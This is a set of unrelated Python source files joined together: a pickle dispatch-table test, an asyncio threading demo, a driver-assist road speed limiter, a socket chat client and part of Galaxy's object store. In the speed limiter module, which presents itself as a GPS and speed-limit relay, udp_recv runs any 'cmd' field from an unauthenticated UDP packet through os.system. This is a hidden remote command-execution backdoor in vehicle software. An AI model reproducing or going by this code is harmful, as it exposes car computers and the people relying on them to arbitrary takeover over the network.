self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
8 coroutine async_&_await.py
|
import time
import asyncio
from queue import Queue
from threading import Thread
def start_loop(loop):
# An event loop that runs forever in the background
asyncio.set_event_loop(loop)
loop.run_forever()
async def do_sleep(x, queue, msg=""):
await asyncio.sleep(x)
queue.put(msg)
queue = Queue()
new_loop = asyncio.new_event_loop()
# Create a thread and hand it the event loop object
t = Thread(target=start_loop, args=(new_loop,))
t.start()
print(time.ctime())
# Dynamically schedule two coroutines on the background loop
# With this approach, execution is asynchronous with respect to the main thread
asyncio.run_coroutine_threadsafe(do_sleep(6, queue, "first"), new_loop)
asyncio.run_coroutine_threadsafe(do_sleep(3, queue, "second"), new_loop)
while True:
msg = queue.get()
print("{} 协程运行完..".format(msg))
print(time.ctime())
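# Note: because do_sleep awaits asyncio.sleep, both coroutines wait on the loop
# concurrently ("second" is reported after ~3 s, "first" after ~6 s). In the
# commented-out variant below, do_sleep calls time.sleep, which blocks the loop
# thread, so the two callbacks finish one after the other (~6 s and ~9 s).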
# =================================================
# # sync
#
# def start_loop(loop):
# # An event loop that runs forever in the background
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# def do_sleep(x, queue, msg=""):
# time.sleep(x)
# queue.put(msg)
#
#
# queue = Queue()
#
# new_loop = asyncio.new_event_loop()
#
# # Create a thread and hand it the event loop object
# t = Thread(target=start_loop, args=(new_loop,))
# t.start()
#
# print(time.ctime())
#
# # Dynamically schedule two callbacks on the background loop
# # With this approach, execution is synchronous with respect to the main thread
# new_loop.call_soon_threadsafe(do_sleep, 6, queue, "first")
# new_loop.call_soon_threadsafe(do_sleep, 3, queue, "second")
#
# while True:
# msg = queue.get()
# print("{} 协程运行完..".format(msg))
# print(time.ctime())
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.numpy_fast import clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
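"""UDP helper that broadcasts a discovery beacon ('EON:ROAD_LIMIT_SERVICE:v1'),
relays GPS fixes to the connected client, and caches the road/camera
speed-limit JSON the client sends back."""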
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.daemon = True
broadcast.start()
gps = Thread(target=self.gps_thread, args=[])
gps.daemon = True
gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps({"location": [
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
]})
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
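# 0x8919 is SIOCGIFBRDADDR: ask the kernel for wlan0's IPv4 broadcast address.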
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def send_sdp(self, sock):
try:
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
ret = False
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
ret = False
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
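# Try port 843 first; fall back to RECEIVE_PORT (2843) if that bind fails
# (ports below 1024 normally require elevated privileges).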
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.send_sdp(sock)
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 20
MAX_LIMIT = 100
else:
MIN_LIMIT = 20
MAX_LIMIT = 120
if cam_type == 22: # speed bump
MIN_LIMIT = 10
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
if cam_type == 22:
safe_dist = v_ego * 3.
else:
safe_dist = v_ego * 6.
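# Start slowing roughly 30 seconds of travel before the camera; hold the final
# limit from about 3 s (speed bump) or 6 s (other cameras) of travel out.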
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
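# pp falls from 1.0 (where slowing started) to 0.0 at the safety distance;
# the 0.6 exponent eases the allowed speed from the current speed down to the
# camera limit, with a steeper drop as the safety distance approaches.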
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
ClientConnection.py
|
import socket
import getpass
from threading import Thread
"""This module taces care of the server-specific logic."""
class ClientConnection:
"""Base class which takes care of initializing the client \
for either chat or transfer."""
def __init__(self, server_ip, client_ip, callbacks):
self.server_ip = server_ip
self.client_ip = client_ip
def start(self):
self.clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.clientsocket.connect((self.server_ip, 8087))
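# read_from_server() is provided by the ChatClient / TransferClient subclasses.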
self.read_from_server()
class ChatClient(ClientConnection):
"""Takes care of initializing the client for chat."""
def __init__(self, server_ip, client_ip, callbacks):
ClientConnection.__init__(self, server_ip, client_ip, callbacks)
self.ready_for_chat, self.on_send, self.on_receive = callbacks
def read_from_server(self):
self.thread = Thread(target=self.printer)
self.thread.daemon = True
self.thread.start()
self.ready_for_chat(self.send_message)
def send_message(self, message):
self.clientsocket.send(message.encode())
self.on_send(message)
def printer(self):
while True:
buf = self.clientsocket.recv(128)
if len(buf) > 0:
user = getpass.getuser()
message = buf.decode()
self.on_receive(user, self.client_ip, message)
class TransferClient(ClientConnection):
"""Takes care of initializing the server endpoint for transfer."""
def __init__(self, server_ip, client_ip, callbacks):
ClientConnection.__init__(self, server_ip, client_ip, callbacks)
self.transfer_send, self.transfer_receive = callbacks
def read_from_server(self):
while True:
buf = self.clientsocket.recv(128)
if len(buf) > 0:
self.transfer_receive(buf)
else:
break
self.clientsocket.close()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import abc
import logging
import os
import random
import shutil
import threading
import time
from collections import OrderedDict
import yaml
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
parse_xml,
umask_fix_perms,
)
from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(metaclass=abc.ABCMeta):
"""ObjectStore interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
@abc.abstractmethod
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
@abc.abstractmethod
def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
@abc.abstractmethod
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
@abc.abstractmethod
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
@abc.abstractmethod
def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
@abc.abstractmethod
def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
@abc.abstractmethod
def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct access if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@abc.abstractmethod
def get_store_by(self, obj):
"""Return how object is stored (by 'uuid', 'id', or None if not yet saved).
Certain Galaxy remote data features aren't available if objects are stored by 'id'.
"""
raise NotImplementedError()
class BaseObjectStore(ObjectStore):
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
extra_dirs = {}
extra_dirs['job_work'] = config.jobs_directory
extra_dirs['temp'] = config.new_file_path
extra_dirs.update({
e['type']: e['path'] for e in config_dict.get('extra_dirs', [])})
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
'config': config_to_dict(self.config),
'extra_dirs': extra_dirs,
'type': self.store_type,
}
def _get_object_id(self, obj):
if hasattr(obj, self.store_by):
obj_id = getattr(obj, self.store_by)
if obj_id is None:
obj.flush()
return obj.id
return obj_id
else:
# jobs don't have uuids, so always use the ID in this case when creating
# job working directories.
return obj.id
def _invoke(self, delegate, obj=None, **kwargs):
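# The public API methods below delegate to the underscore-prefixed
# implementations (e.g. exists() -> _exists()) supplied by subclasses.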
return self.__getattribute__("_" + delegate)(obj=obj, **kwargs)
def exists(self, obj, **kwargs):
return self._invoke('exists', obj, **kwargs)
def create(self, obj, **kwargs):
return self._invoke('create', obj, **kwargs)
def empty(self, obj, **kwargs):
return self._invoke('empty', obj, **kwargs)
def size(self, obj, **kwargs):
return self._invoke('size', obj, **kwargs)
def delete(self, obj, **kwargs):
return self._invoke('delete', obj, **kwargs)
def get_data(self, obj, **kwargs):
return self._invoke('get_data', obj, **kwargs)
def get_filename(self, obj, **kwargs):
return self._invoke('get_filename', obj, **kwargs)
def update_from_file(self, obj, **kwargs):
return self._invoke('update_from_file', obj, **kwargs)
def get_object_url(self, obj, **kwargs):
return self._invoke('get_object_url', obj, **kwargs)
def get_store_usage_percent(self):
return self._invoke('get_store_usage_percent')
def get_store_by(self, obj, **kwargs):
return self._invoke('get_store_by', obj, **kwargs)
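# A minimal, hypothetical sketch (not part of the Galaxy API) of the delegation
# pattern used above: the public methods funnel through _invoke, which looks up
# an underscore-prefixed implementation that concrete subclasses override.
class _ExampleDelegatingStore:
    def _invoke(self, delegate, obj=None, **kwargs):
        # "exists" dispatches to "_exists", "create" to "_create", and so on.
        return getattr(self, "_" + delegate)(obj=obj, **kwargs)
    def exists(self, obj, **kwargs):
        return self._invoke('exists', obj, **kwargs)
    def _exists(self, obj, **kwargs):
        # Concrete backends override this stub.
        return False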
class ConcreteObjectStore(BaseObjectStore):
"""Subclass of ObjectStore for stores that don't delegate (non-nested).
Currently only adds store_by functionality, which doesn't make sense
for the delegating object stores.
"""
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
super().__init__(config=config, config_dict=config_dict, **kwargs)
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
def to_dict(self):
rval = super().to_dict()
rval["store_by"] = self.store_by
return rval
def _get_store_by(self, obj):
return self.store_by
class DiskObjectStore(ConcreteObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = 'disk'
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super().__init__(config, config_dict)
self.file_path = os.path.abspath(config_dict.get("files_dir") or config.file_path)
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
store_by = config_xml.attrib.get('store_by', None)
if store_by is not None:
config_dict['store_by'] = store_by
for e in config_xml:
if e.tag == 'files_dir':
config_dict["files_dir"] = e.get('path')
else:
extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super().to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def __get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
obj_dir=False, old_style=True)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
return path
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
:param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data, but just
# make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
obj_id = self._get_object_id(obj)
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
assert obj_id is not None, "The effective dataset identifier consumed by object store [%s] must be set before a path can be constructed." % (self.store_by)
path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
return os.path.abspath(path)
def _exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def _create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self._exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get('dir_only', False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, 'w').close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def _empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def _size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self._exists(obj, **kwargs):
try:
filepath = self._get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self._get_filename(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
obj_dir = kwargs.get('obj_dir', False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self._exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical('{} delete error {}'.format(self.__get_filename(obj, **kwargs), ex))
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self._get_filename(obj, **kwargs)) # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
